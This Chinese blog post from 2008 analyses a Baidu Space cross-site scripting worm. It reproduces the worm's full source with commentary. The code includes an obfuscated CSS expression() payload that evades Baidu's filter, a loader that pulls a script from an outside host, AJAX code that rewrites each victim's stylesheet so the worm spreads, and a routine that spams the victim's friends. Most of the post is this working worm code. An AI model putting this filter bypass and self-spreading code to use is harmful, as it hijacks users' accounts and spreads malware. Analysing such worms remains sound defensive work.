我的黑客生活
我的黑客生活
我是黑客吗?没有人给我回答 我还是学生.还要完成我的学业 注意: 本人可以回答问题 第一个免费,第二个免费,第三个收费,以后可以考虑打折!
临川一中不是人待的地方!!
博客信息
博主:DataBaseOwner 
栏目分类
最新文章
最新评论
标签列表
博客搜索
日志存档
·2009-1 ( 1 )
·2008-10 ( 4 )
·2008-7 ( 4 )
·2008-6 ( 5 )
·2008-5 ( 1 )
·2008-4 ( 3 )
·2008-2 ( 10 )
·2008-1 ( 53 )
友情链接
统计信息
访问:90516 次
今日访问:3次
日志: -161篇
评论: 29 个
留言: 9 个
建站时间: 2008-1-12
博客成员
DataBaseOwner 管 理 员
数字狼 管 理 员
最近访客



百度空间蠕虫分析
作者:DataBaseOwner 提交日期:2008-1-28 11:15:00 正常| 访问量:441

From:http://hi.baidu.com/ycosxhack/blog/item/72ad7a90f2cf6389a877a419.html

声明在前:

此蠕虫源码迟早会曝光,也没隐藏的必要,得到消息称百度空间工程师正在修补中,我写完这篇文章是对其感染技术进行分析,估计等我写完文章时这样的漏洞利用方式就会失效(希望他们的效率高些)。

--------------------------------------------------------------------------------------------------------

今天看到52abc的文章说百度空间蠕虫诞生。刚开始我一直不相信ex/* */pression()这样的变形expression还有效,可是分析蠕虫源码时发现原来是这样的ex/*exp/**/ression*/pression。被感染的用户空间的CSS末被嵌入一段恶意代码,如下:

a{evilmask:ex/* */pression(execScript(unescape('d%3D%22doc%22%2B%22ument%22%3B%0D%0Ai%3D%22function%20load%28%29%7Bvar%20x%3D%22%2Bd%2B%22.createElement%28%27SCRIPT%27%29%3Bx.src%3D%27http%3A//www.18688.com/cache/1.js%27%3Bx.defer%3Dtrue%3B%22%2Bd%2B%22.getElementsByTagName%28%27HEAD%27%29%5B0%5D.appendChild%28x%29%7D%3Bfunction%20inject%28%29%7Bwindow.setTimeout%28%27load%28%29%27%2C1000%29%7D%3Bif%28window.x%21%3D1%29%7Bwindow.x%3D1%3Binject%28%29%7D%3B%22%0D%0AexecScript%28i%29')))}

利用变形的expression在CSS代码中动态执行脚本,由于/* */这个符号是CSS的注释符,所以浏览器在解释这个CSS片段时会自动忽略,所以变形后的expression是有效的。接着利用execScript函数(只在 IE中有效,并且可以动态执行远程js文件)来执行unescape解密出的代码。unescape解密出的代码如下:

d="doc"+"ument";
i="function load(){var x="+d+".createElement('SCRIPT');x.src='http://www.18688.com/cache/1.js';x.defer=true;"+d+".getElementsByTagName('HEAD')[0].appendChild(x)};function inject(){window.setTimeout('load()',1000)};if(window.x!=1){window.x=1;inject()};"
execScript(i)

此片段代码会在文档标签内动态创建<script>标签,用来加载远程js文件:http://www.18688.com/cache/1.js。其中inject()函数是为了防止expression对其内部代码的多次执行,不过似乎不完美。IE浏览器卡死的原因是后台在偷偷地大量发送蠕虫伪造的信息,格式为: evilmsg="哈,节日快乐呀!热烈庆祝2008,心情好好,记得要想我呀!\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r \n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"+myhibaidu;。接着分析http://www.18688.com/cache/1.js文件发现漏洞产生的原因:expression变形为ex/*exp/**/ression*/pression。百度空间的过滤机制将变形后的ex/*exp/**/ression*/pression中的exp/**/ression过滤为空格,于是还剩下exp/* */ression!道高一尺,魔高一丈。完整js代码如下,看注释分析:

window.onerror = killErrors;
//下面这段乱码定义了VBScript函数URLEncoding,以正确编码数值。我曾经在《来看看AJAX本地如何获取远程数据》这篇文章中提到过bytes2BSTR函数,它们功能相似
///////////////////////////////////////////////////
//解密出的效果如下:
//Function URLEncoding(vstrIn)
// strReturn = ""
// For aaaa = 1 To Len(vstrIn)
// ThisChr = Mid(vStrIn,aaaa,1)
// If Abs(Asc(ThisChr)) < &HFF Then
// strReturn = strReturn & ThisChr
// Else
// innerCode = Asc(ThisChr)
// If innerCode < 0 Then
// innerCode = innerCode + &H10000
// End If
// Hight8 = (innerCode And &HFF00)\ &HFF
// Low8 = innerCode And &HFF
// strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
// End If
// Next
// URLEncoding = strReturn
//End Function
///////////////////////////////////////////////////
execScript(unescape('Function%20URLEncoding%28vstrIn%29%0A%20%20%20%20strReturn%20%3D%20%22%22%0A%20%20%20%20For%20aaaa%20%3D%201%20To%20Len%28vstrIn%29%0A%20%20%20%20%20%20%20%20ThisChr%20%3D%20Mid%28vStrIn%2Caaaa%2C1%29%0A%20%20%20%20%20%20%20%20If%20Abs%28Asc%28ThisChr%29%29%20%3C%20%26HFF%20Then%0A%20%20%20%20%20%20%20%20%20%20%20%20strReturn%20%3D%20strReturn%20%26%20ThisChr%0A%20%20%20%20%20%20%20%20Else%0A%20%20%20%20%20%20%20%20%20%20%20%20innerCode%20%3D%20Asc%28ThisChr%29%0A%20%20%20%20%20%20%20%20%20%20%20%20If%20innerCode%20%3C%200%20Then%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20innerCode%20%3D%20innerCode%20+%20%26H10000%0A%20%20%20%20%20%20%20%20%20%20%20%20End%20If%0A%20%20%20%20%20%20%20%20%20%20%20%20Hight8%20%3D%20%28innerCode%20%20And%20%26HFF00%29%5C%20%26HFF%0A%20%20%20%20%20%20%20%20%20%20%20%20Low8%20%3D%20innerCode%20And%20%26HFF%0A%20%20%20%20%20%20%20%20%20%20%20%20strReturn%20%3D%20strReturn%20%26%20%22%25%22%20%26%20Hex%28Hight8%29%20%26%20%20%22%25%22%20%26%20Hex%28Low8%29%0A%20%20%20%20%20%20%20%20End%20If%0A%20%20%20%20Next%0A%20%20%20%20URLEncoding%20%3D%20strReturn%0AEnd%20Function'),'VBScript');
cookie='';
cookieval=document.cookie;
spaceid=spaceurl;
myhibaidu="http://hi.baidu.com"+spaceid;
//初始化XMLHttpRequest对象,AJAX要在这使用
xmlhttp=poster();
debug=0;

//统计在线人数的函数,下面有定义
online();

if(spaceurl!=''){
if(spaceid!='/') {
if(debug==1) {
goteditcss();
document.cookie='xssshell/owned/you!';
}
//如果用户本地cookie中不含xssshell标志,则执行goteditcss函数,下面有定义
if(cookieval.indexOf('xssshell')==-1) {
goteditcss();
document.cookie='xssshell/owned/you!';
}
}
}
//此为百度空间蠕虫的核心功能函数
function makeevilcss(spaceid,editurl,use){
//此playload即为蠕虫广泛传播的CSS代码片段,其中expression变形为ex/*exp/**/ression*/pression
playload="a{evilmask:ex/*exp/**/ression*/pression(execScript(unescape('d%253D%2522doc%2522%252B%2522ument%2522%253B%250D%250Ai%253D%2522function%2520load%2528%2529%257Bvar%2520x%253D%2522%252Bd%252B%2522.createElement%2528%2527SCRIPT%2527%2529%253Bx.src%253D%2527http%253A//www.18688.com/cache/1.js%2527%253Bx.defer%253Dtrue%253B%2522%252Bd%252B%2522.getElementsByTagName%2528%2527HEAD%2527%2529%255B0%255D.appendChild%2528x%2529%257D%253Bfunction%2520inject%2528%2529%257Bwindow.setTimeout%2528%2527load%2528%2529%2527%252C1000%2529%257D%253Bif%2528window.x%2521%253D1%2529%257Bwindow.x%253D1%253Binject%2528%2529%257D%253B%2522%250D%250AexecScript%2528i%2529')))}";
//下面是在模拟用户创建CSS模板的表单结构以及数据添加、提交过程
action=myhibaidu+"/commit";
spCssUse=use;
//AJAX在后面偷偷地异步获取远程数据
s=getmydata(editurl);

re = /\ct = s.match(re);
ct=(ct[1]);

re = /\cm = s.match(re);
cm=(cm[1])/1+1;

re = /\spCssID = s.match(re);
spCssID=(spCssID[1]);

spRefUrl=editurl;


re = /\([^\x00]*?)\<\/textarea\>/i;
spCssText = s.match(re);
spCssText=spCssText[2];
spCssText=URLEncoding(spCssText);

//如果已经存在此邪恶的CSS片段,蠕虫则不再次感染
if(spCssText.indexOf('evilmask')!==-1) {
return 1;
}
//否则……
else spCssText=spCssText+"\r\n\r\n"+playload;


re = /\/i;
spCssName = s.match(re);
spCssName=spCssName[2];


re = /\/i;
spCssTag = s.match(re);
spCssTag=spCssTag[2];

postdata="ct="+ct+"&spCssUse=1"+"&spCssColorID=1"+"&spCssLayoutID=-1"+"&spRefURL="+URLEncoding(spRefUrl)+"&spRefURL="+URLEncoding(spRefUrl)+"&cm="+cm+"&spCssID="+spCssID+"&spCssText="+spCssText+"&spCssName="+URLEncoding(spCssName)+"&spCssTag="+URLEncoding(spCssTag);
//AJAX在后台再次偷偷地将编辑好的CSS数据保存到百度空间服务器上
result=postmydata(action,postdata);
//调用好友发送信息函数
sendfriendmsg();
//统计感染用户总数
count();
//成功
hack();
}



//此函数初始化数据,调用核心功能函数makeevilcss
function goteditcss() {
src="http://hi.baidu.com"+spaceid+"/modify/spcrtempl/0";
s=getmydata(src);
re = /\/i;
r = s.match(re);
nowuse=r[2];
makeevilcss(spaceid,"http://hi.baidu.com"+spaceid+"/modify/spcss/"+nowuse+".css/edit",1);
return 0;
}



//创建XMLHttpRequest对象
function poster(){
 var request = false;
 if(window.XMLHttpRequest) {
 request = new XMLHttpRequest();
 if(request.overrideMimeType) {
 request.overrideMimeType('text/xml');
 }
 } else if(window.ActiveXObject) {
 var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
 for(var i=0; i try {
 request = new ActiveXObject(versions[i]);
 } catch(e) {}
 }
 }
 return request;
}



//XMLHttpRequest对象使用POST方式异步发送数据
function postmydata(action,data){
 xmlhttp.open("POST", action, false);
 xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
 xmlhttp.send(data);
return xmlhttp.responseText;
}

//XMLHttpRequest对象使用GET方式异步发送数据
function getmydata(action){
 xmlhttp.open("GET", action, false);
 xmlhttp.send();
return xmlhttp.responseText;
}


function killErrors() {
return true;
}

//统计感染用户总数
function count() {
a=new Image();
a.src='http://img.users.51.la/1563171.asp';
return 0;
}

//统计感染用户在线总数
function online() {
online=new Image();
online.src='http://img.users.51.la/1563833.asp ';
return 0;
}

function hack() {
return 0;
}

//好友发送信息函数,当你收到这样的消息那就要注意了
function sendfriendmsg(){
myfurl=myhibaidu+"/friends";
s=getmydata(myfurl);
evilmsg="哈,节日快乐呀!热烈庆祝2008,心情好好,记得要想我呀!\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"+myhibaidu;

var D=function(A,B){A[A.length]=B;};
re = /(.+)D\(k\,\[([^\]]+?)\]\)(.*)/g;
friends = s.match(re);
eval(friends[0]);
for(i in k) {
 eval('msgimg'+i+'=new Image();');
 eval('msgimg'+i+'.src="http://msg.baidu.com/?ct=22&cm=MailSend&tn=bmSubmit&sn="+URLEncoding(k[i][2])+"&co="+URLEncoding(evilmsg)+"&vcodeinput=";');
}
}

简单分析完了。这又是一只AJAX蠕虫。WEB2.0的各类安全威胁中AJAX首当其冲!由于AJAX会在后台无声无息地传递数据,很难被发现,这就为AJAX蠕虫隐身传播带来了绝佳的便利!我刚刚也构造了漏洞利用代码,只是一个简单的alert框,没危害。我将漏洞利用转移到我这个测试博客上了:http://hi.baidu.com/coscmic。进去后,会弹出对话框。没事。


#日志日期:2008-1-28 星期一(Monday) 晴 送小红花 推荐指数:复制链接 举报


登录 | 新人注册>>
输入您的评论:(不支持HTML标签)


验证码
本文所属博客:我的黑客生活
引用地址:


copyright blog.tianya.cn

© 天涯社区